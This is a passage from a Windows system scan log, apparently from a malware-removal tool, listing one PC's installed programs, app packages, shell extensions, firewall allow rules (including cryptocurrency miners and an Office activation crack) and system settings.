9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x64) - 14.14.26429 (HKLM-x32\...\{80586c77-db42-44bb-bfc8-7aebbb220c00}) (Version: 14.14.26429.4 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25017 (HKLM-x32\...\{f325f05b-f963-4640-a43b-c8a494cdda0f}) (Version: 14.10.25017.0 - Microsoft Corporation) Native Instruments FM8 (HKLM-x32\...\Native Instruments FM8) (Version: 1.4.0.1498 - Native Instruments) Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments) Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team) OBS Studio (HKLM-x32\...\OBS Studio) (Version: 22.0.2 - OBS Project) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.11425.20228 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.11425.20228 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.11425.20228 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.11425.20228 - Microsoft Corporation) Hidden OneKeyRecovery (HKLM-x32\...\{B1C01152-7A95-4F37-AEDC-5B09DE983271}) (Version: 9.0.1.1607 - Lenovo) OpenIV (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\OpenIV) (Version: 3.0.1006 - .black/OpenIV Team) osrss (HKLM-x32\...\{1BA1133B-1C7A-41A0-8CBF-9B993E63D296}) (Version: 1.0.0 - Microsoft Corporation) Hidden PDFMate eBook Converter Professional 1.0.1 (HKLM-x32\...\PDFMate eBook Converter Professional) (Version: 1.0.1 - PDFMate eBook Converter Professional) Project64 version 2.3.2.202 (HKLM-x32\...\{BEB5FB69-4080-466F-96C4-F15DF271718B}_is1) (Version: 2.3.2.202 - ) Python 2.7.16 (64-bit) (HKLM\...\{DCD5B320-89D9-4C7C-9E8B-84496588744e}) (Version: 2.7.16150 - Python Software Foundation) Python 3.4 pygame-1.9.2a0 (HKLM\...\{40682844-6E85-4D43-89F8-FD68B09E2A52}) (Version: 1.9.2 - Pete Shinners, Rene Dudfield, Marcus von Appen, Bob Pendleton, others...) Python 3.7.2 (32-bit) (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\{0f40e78b-67e1-4e0c-a2fd-e9325d9dfc82}) (Version: 3.7.2150.0 - Python Software Foundation) Python 3.7.2 (64-bit) (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\{c0f1e976-f585-48f8-968d-48c870496d4e}) (Version: 3.7.2150.0 - Python Software Foundation) Python 3.7.2 Add to Path (32-bit) (HKLM-x32\...\{A0253733-D4C4-4964-AB97-C5C80FCD580F}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Add to Path (64-bit) (HKLM\...\{55DD38E4-4D05-4A05-A1CD-415A07DAF40B}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Core Interpreter (32-bit) (HKLM-x32\...\{3A09B849-4D48-41AA-9461-112E6CEC405D}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Core Interpreter (64-bit symbols) (HKLM\...\{DD895F52-DDAD-4CC6-938C-0D29E379A87E}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Core Interpreter (64-bit) (HKLM\...\{8BDA6D6E-234F-4DD8-A7CA-6DB55F6B609E}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Development Libraries (32-bit) (HKLM-x32\...\{A14E7090-5888-460B-9003-1C3DA5AD3D35}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Development Libraries (64-bit) (HKLM\...\{D2CC67CD-ED4E-40BC-94FD-3EA65A6824D6}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Documentation (32-bit) (HKLM-x32\...\{D2FA452F-4742-4805-BEB1-AC81ED48F4A8}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Documentation (64-bit) (HKLM\...\{1A91F9E1-13CE-4D8B-9257-61376EC9ED92}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Executables (32-bit) (HKLM-x32\...\{D6FF50CC-E41E-4FFB-B7B9-72D71BF00C55}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Executables (64-bit symbols) (HKLM\...\{70152518-F739-42DD-B6C4-E43D65B127F0}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Executables (64-bit) (HKLM\...\{24260BC9-6F83-4F8F-96AE-6D654621DDF7}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 pip Bootstrap (32-bit) (HKLM-x32\...\{0D2B3674-3B1E-4281-B5FD-37D700602129}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 pip Bootstrap (64-bit) (HKLM\...\{E33F2815-DA54-4554-87A2-FD25EAB1A963}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Standard Library (32-bit) (HKLM-x32\...\{667226B8-23CA-47C1-A070-D3B85E8C9292}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Standard Library (64-bit symbols) (HKLM\...\{42BBA31E-AB76-480F-9B67-79564C3A2C3B}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Standard Library (64-bit) (HKLM\...\{BE46C9B8-DD8E-4835-B686-644EA6415FEE}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Tcl/Tk Support (32-bit) (HKLM-x32\...\{34AD493A-01AA-4D6A-9229-BF0406F22D14}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Tcl/Tk Support (64-bit symbols) (HKLM\...\{B23B590C-3BBC-4945-BED8-FEB4D5F953B2}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Tcl/Tk Support (64-bit) (HKLM\...\{1ED81958-CE51-4748-ABFA-583227794FDB}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Test Suite (32-bit) (HKLM-x32\...\{F0B6A6E9-C7E1-4730-A29D-71C02B800028}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Test Suite (64-bit symbols) (HKLM\...\{1EE636DD-EEFD-4F97-87C5-247050EFA6B7}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Test Suite (64-bit) (HKLM\...\{C1CA4559-3153-4EF9-8B74-CC804965E441}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Utility Scripts (32-bit) (HKLM-x32\...\{06CE3F8B-A658-462C-AD3D-FA7142297E97}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python 3.7.2 Utility Scripts (64-bit) (HKLM\...\{259C5D04-A6E0-47F3-AB23-91F2E9828466}) (Version: 3.7.2150.0 - Python Software Foundation) Hidden Python Launcher (HKLM-x32\...\{FA2A3867-8965-4CF7-83E2-C8960652F5AD}) (Version: 3.7.6565.0 - Python Software Foundation) reFX Nexus VSTi RTAS v2.2.0 (HKLM-x32\...\reFX Nexus_is1) (Version: - ) Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.5.8 - Rockstar Games) Sky Go 1.4.16.0 (HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\com.bskyb.skygoplayer_is1) (Version: 1.4.16.0 - Sky) SonicProjects OP-X PRO-II (HKLM\...\OP-X PRO-II_is1) (Version: 1.2.5 - Team V.R) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) SuperWave Equinoxe Extreme HD Edition (Poly 20) (HKLM-x32\...\{CE6B55F8-6BBE-4999-A050-E01EE5A595F7}) (Version: 1.0 - SuperWave) TunnelBear (HKLM-x32\...\{0d6e112b-ecd9-4b6a-92ed-6e708fb7de2f}) (Version: 3.6.3.0 - TunnelBear) TunnelBear (HKLM-x32\...\{95EAEB10-FF80-47E1-BAF7-4B46C4D6A46C}) (Version: 3.6.3.0 - TunnelBear) Hidden Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{C3ACFCEA-240F-4DCC-A0C3-DD55FEE6C3C2}) (Version: 2.58.0.0 - Microsoft Corporation) UpdateAssistant (HKLM\...\{52C1DD03-104E-4AC6-9DC6-21D585721ED1}) (Version: 1.19.0.0 - Microsoft Corporation) Hidden VB3-II version 1.0.3 (HKLM\...\VB3-II_is1) (Version: 1.0.3 - Genuine Soundware & Instruments & Team V.R) VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN) Waves Central 10.0.0.3 (HKLM-x32\...\{94000200-C561-4E32-99EB-3C5AD3683A70}_is1) (Version: 10.0.0 - Waves, Inc.) Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22532 - Microsoft Corporation) Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - ) Packages: ========= Autodesk SketchBook -> C:\Program Files\WindowsApps\89006A2E.AutodeskSketchBook_5.0.2.0_x64__tf1gferkr813w [2019-05-27] (Autodesk Inc.) EdgeDevtoolsPlugin -> C:\WINDOWS\SystemApps\Microsoft.EdgeDevtoolsPlugin_cw5n1h2txyewy [2018-09-20] (Microsoft Corporation) iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa [2019-05-29] (Apple Inc.) Lenovo Account Portal -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoID_2.0.37.0_x86__4642shxvsv8s2 [2018-09-16] (LENOVO INCORPORATED.) Lenovo Vantage -> C:\Program Files\WindowsApps\E046963F.LenovoCompanion_4.27.32.0_x86__k1h2ywk1493x8 [2019-03-26] (LENOVO INC.) Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20174.0_x64__8wekyb3d8bbwe [2019-05-30] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-18] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-18] (Microsoft Corporation) [MS Ad] Microsoft Minesweeper -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMinesweeper_2.7.4300.0_x86__8wekyb3d8bbwe [2018-10-09] (Microsoft Studios) [MS Ad] Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.30.10924.0_x64__8wekyb3d8bbwe [2019-04-05] (Microsoft Corporation) [MS Ad] Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.3.4032.0_x86__8wekyb3d8bbwe [2019-04-10] (Microsoft Studios) [MS Ad] MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.28.10351.0_x64__8wekyb3d8bbwe [2019-02-12] (Microsoft Corporation) [MS Ad] NOW TV -> C:\Program Files\WindowsApps\NOWTV.NOWTV_1.19.0.2_x64__k6nsketb5gh92 [2018-09-30] (Sky UK Limited) Plex -> C:\Program Files\WindowsApps\CAF9E577.Plex_3.2.20.0_x64__aam28m9va5cke [2018-09-16] (Plex) Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.1.135.0_x64__dt26b99r8h8gj [2019-04-08] (Realtek Semiconductor Corp) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [File not signed] ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> ) ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [File not signed] ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [File not signed] ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes) ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) ==================== Loaded Modules (Whitelisted) ============== 2018-09-11 23:15 - 2018-09-11 23:15 - 000167424 _____ () [File not signed] C:\Program Files (x86)\TunnelBear\TunnelBear.VigilantBear.Wrapper.dll 2019-05-11 07:44 - 2018-12-18 03:20 - 001006080 _____ () [File not signed] C:\ProgramData\Lenovo\iMController\Plugins\LenovoWiFiSecurityPlugin\x86\x86\e_sqlite3.dll 2018-09-14 11:22 - 2018-04-30 13:00 - 000075776 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll 2019-03-16 10:13 - 2018-08-12 21:29 - 001255424 _____ (Robert Simpson, et al.) [File not signed] C:\ProgramData\Lenovo\iMController\Plugins\GenericMessagingPlugin\x86\x86\SQLite.Interop.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\localhost -> localhost ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2017-03-18 22:03 - 2019-06-09 19:47 - 000000830 _____ C:\WINDOWS\system32\drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Program Files\Python37\Scripts\;C:\Program Files\Python37\;%INTEL_DEV_REDIST%redist\ia32\compiler;%INTEL_DEV_REDIST%redist\intel64\compiler;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files (x86)\Calibre2\;C:\Program Files\Csound6_x64\bin;C:\Program Files\Cabbage HKU\S-1-5-21-1007420050-912919110-3395148121-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\MYMLA\Downloads\Mymla image 2.png DNS Servers: 192.168.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: ) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == If an entry is included in the fixlist, it will be removed. ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [UDP Query User{5BCC5A17-DCF8-468C-9D70-9F666919D7B3}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed] FirewallRules: [TCP Query User{9FCA9CBB-5FAA-4EC1-B494-DC10F4CAEDEC}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed] FirewallRules: [{D8A93456-1AC4-4AC2-87FA-E4C1C31E7318}] => (Allow) C:\Users\MYMLA\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{D1DA5DBA-D82D-4C1B-98BC-CBE51CA60412}] => (Allow) C:\Users\MYMLA\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{F39E879E-3FCD-4756-8098-2474802545C4}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe (CyberLink Corp. -> CyberLink Corp.) FirewallRules: [{DFF6C8B5-0677-447A-9873-B8DF601CADBD}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe No File FirewallRules: [{17873308-4430-4E91-877D-546EC7870DF2}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe No File FirewallRules: [{888C4B9A-1006-4CBD-99AE-EDE5B8788C5C}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe (CyberLink Corp. -> CyberLink Corp.) FirewallRules: [{A3150413-7F2C-4302-B45D-E89D1A83F2F8}] => (Allow) C:\Program Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe (LENOVO -> Lenovo) FirewallRules: [{BD6563C2-95DD-45F1-B99F-F5D0FF0488CC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation) FirewallRules: [{79B91D1E-CBC8-4452-9631-0C4853EDA57A}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation) FirewallRules: [{953AC05B-38C7-452F-9B50-DC1B3E45F88A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File FirewallRules: [{E896D712-BA1B-4DD6-910F-70CA34074D85}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File FirewallRules: [TCP Query User{71C82E1C-714A-45E8-8F14-455FC5C6B671}C:\program files\droidjoy server\droidjoyserver.exe] => (Allow) C:\program files\droidjoy server\droidjoyserver.exe No File FirewallRules: [UDP Query User{9DA8EB19-4587-401C-B9CA-18EDF4AE2D4D}C:\program files\droidjoy server\droidjoyserver.exe] => (Allow) C:\program files\droidjoy server\droidjoyserver.exe No File FirewallRules: [OpenSSH-Server-In-TCP] => (Allow) %SystemRoot%\system32\OpenSSH\sshd.exe (Microsoft Windows -> ) FirewallRules: [TCP Query User{E116D0EF-682B-424C-8092-726E775BF9ED}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin_3rdparty\claymore_cryptonight\nsgpucnminer.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin_3rdparty\claymore_cryptonight\nsgpucnminer.exe () [File not signed] FirewallRules: [UDP Query User{D3F9D790-DC44-492B-93DD-8AE802A64455}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin_3rdparty\claymore_cryptonight\nsgpucnminer.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin_3rdparty\claymore_cryptonight\nsgpucnminer.exe () [File not signed] FirewallRules: [TCP Query User{558DCCF2-143E-441E-89C7-C836676DDB3D}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak\xmr-stak.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak\xmr-stak.exe () [File not signed] FirewallRules: [UDP Query User{00FABDE6-6CAE-4E75-AC3C-5685E3A22339}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak\xmr-stak.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak\xmr-stak.exe () [File not signed] FirewallRules: [TCP Query User{2B21D801-147D-428E-AB77-98E5ACCC10D5}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak_heavy\xmr-stak.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak_heavy\xmr-stak.exe () [File not signed] FirewallRules: [UDP Query User{683EA547-4A20-4EA4-8F7A-43ADB96DBAB8}C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak_heavy\xmr-stak.exe] => (Allow) C:\users\mymla\downloads\nhm_windows_1.9.0.6 (1)\bin\xmr-stak_heavy\xmr-stak.exe () [File not signed] FirewallRules: [TCP Query User{6C41342F-BEB4-48A7-BF5D-0AB0F10B8E3B}C:\program files\bitcoingold\bitcoin-qt.exe] => (Allow) C:\program files\bitcoingold\bitcoin-qt.exe () [File not signed] FirewallRules: [UDP Query User{91C911B8-8377-41EE-9A05-F786BCC8137A}C:\program files\bitcoingold\bitcoin-qt.exe] => (Allow) C:\program files\bitcoingold\bitcoin-qt.exe () [File not signed] FirewallRules: [TCP Query User{E487A2AD-3508-4020-BA88-BB687BCBD4DD}C:\users\mymla\downloads\claymore.s.zcash.amd.gpu.miner.v12.6\zecminer64.exe] => (Allow) C:\users\mymla\downloads\claymore.s.zcash.amd.gpu.miner.v12.6\zecminer64.exe () [File not signed] FirewallRules: [UDP Query User{54411C7F-66A1-46AA-A44D-80A98A724FDA}C:\users\mymla\downloads\claymore.s.zcash.amd.gpu.miner.v12.6\zecminer64.exe] => (Allow) C:\users\mymla\downloads\claymore.s.zcash.amd.gpu.miner.v12.6\zecminer64.exe () [File not signed] FirewallRules: [TCP Query User{FFF83688-9F32-4EF8-A6C0-3636AAD92FC2}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN) FirewallRules: [UDP Query User{2BF6D6C5-45EB-4EF7-B2A1-43E85FBAE833}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN) FirewallRules: [TCP Query User{400E2193-7797-4894-8CE2-0EE1AE4BF7F1}C:\games\grand theft auto v\gta5.exe] => (Allow) C:\games\grand theft auto v\gta5.exe (Take-Two Interactive Software, Inc. -> Rockstar Games) FirewallRules: [UDP Query User{0CD7978B-EFEC-4E04-91B8-CA07C5D39949}C:\games\grand theft auto v\gta5.exe] => (Allow) C:\games\grand theft auto v\gta5.exe (Take-Two Interactive Software, Inc. -> Rockstar Games) FirewallRules: [{2C756361-5B1E-4989-B011-583E8804F5CC}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation) FirewallRules: [{673758B0-B184-4A19-81DE-2D7F2D4F0714}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation) FirewallRules: [{8554282C-AA37-4A97-98F2-5EBDC6B082AA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{1F38B67E-B4CD-4A58-84DB-7C2C83AADBAD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{7ECD9013-AD14-4E2A-8FB3-E3033F273A8D}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{DB3060F7-BAEB-4394-A840-C27E2144A6BC}] => (Allow) C:\Users\MYMLA\Downloads\SAFE\Microsoft.Office.2019.Professional.Plus.ACTiVATiON-iND\OfficeFixes\win_x64\vlmcsd.exe () [File not signed] FirewallRules: [{0A4B426A-5FE9-4F29-B87A-8BAB6017BF1A}] => (Allow) C:\Users\MYMLA\Downloads\SAFE\Microsoft.Office.2019.Professional.Plus.ACTiVATiON-iND\OfficeFixes\win_x64\vlmcsd.exe () [File not signed] FirewallRules: [{E86C5A22-D062-4C6E-B79F-0FE9F2C946E9}] => (Allow) C:\Users\MYMLA\Downloads\SAFE\Microsoft.Office.2019.Professional.Plus.ACTiVATiON-iND\OfficeFixes\win_x64\FakeClient.exe () [File not signed] FirewallRules: [{00ED7511-76C3-4836-86F6-D4724D7ABBB7}] => (Allow) C:\Users\MYMLA\Downloads\SAFE\Microsoft.Office.2019.Professional.Plus.ACTiVATiON-iND\OfficeFixes\win_x64\FakeClient.exe () [File not signed] FirewallRules: [TCP Query User{61C20444-C7D7-46EF-ACDC-03923A55A73E}C:\users\mymla\appdata\roaming\sky\sky go\sky go.exe] => (Allow) C:\users\mymla\appdata\roaming\sky\sky go\sky go.exe (Sky UK Limited -> Sky UK) FirewallRules: [UDP Query User{4DC2A151-320E-431A-85F5-D4159D489C76}C:\users\mymla\appdata\roaming\sky\sky go\sky go.exe] => (Allow) C:\users\mymla\appdata\roaming\sky\sky go\sky go.exe (Sky UK Limited -> Sky UK) FirewallRules: [{EA95FADF-0D3D-45BD-B991-27F5D9E20703}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{8E634A53-1167-46FB-A60F-53C43072EB51}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [TCP Query User{8CBB52BC-2926-4301-8DC9-C94129BEF3EE}C:\program files\jetbrains\pycharm community edition 2019.1.1\bin\pycharm64.exe] => (Allow) C:\program files\jetbrains\pycharm community edition 2019.1.1\bin\pycharm64.exe (JetBrains s.r.o. -> JetBrains s.r.o.) FirewallRules: [UDP Query User{03BEDA6A-7B79-4A20-B760-1A40C804AD50}C:\program files\jetbrains\pycharm community edition 2019.1.1\bin\pycharm64.exe] => (Allow) C:\program files\jetbrains\pycharm community edition 2019.1.1\bin\pycharm64.exe (JetBrains s.r.o. -> JetBrains s.r.o.) FirewallRules: [{B9C843B7-30F4-4036-9AB8-10823D1AB46B}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{1F497EB5-8070-4256-A954-7DE0FB458FF8}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{C9F244D3-AE69-488F-BFA7-052CE9BA5A12}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{869CAB43-30E5-475B-B5A6-84E1D082BD29}] => (Allow) 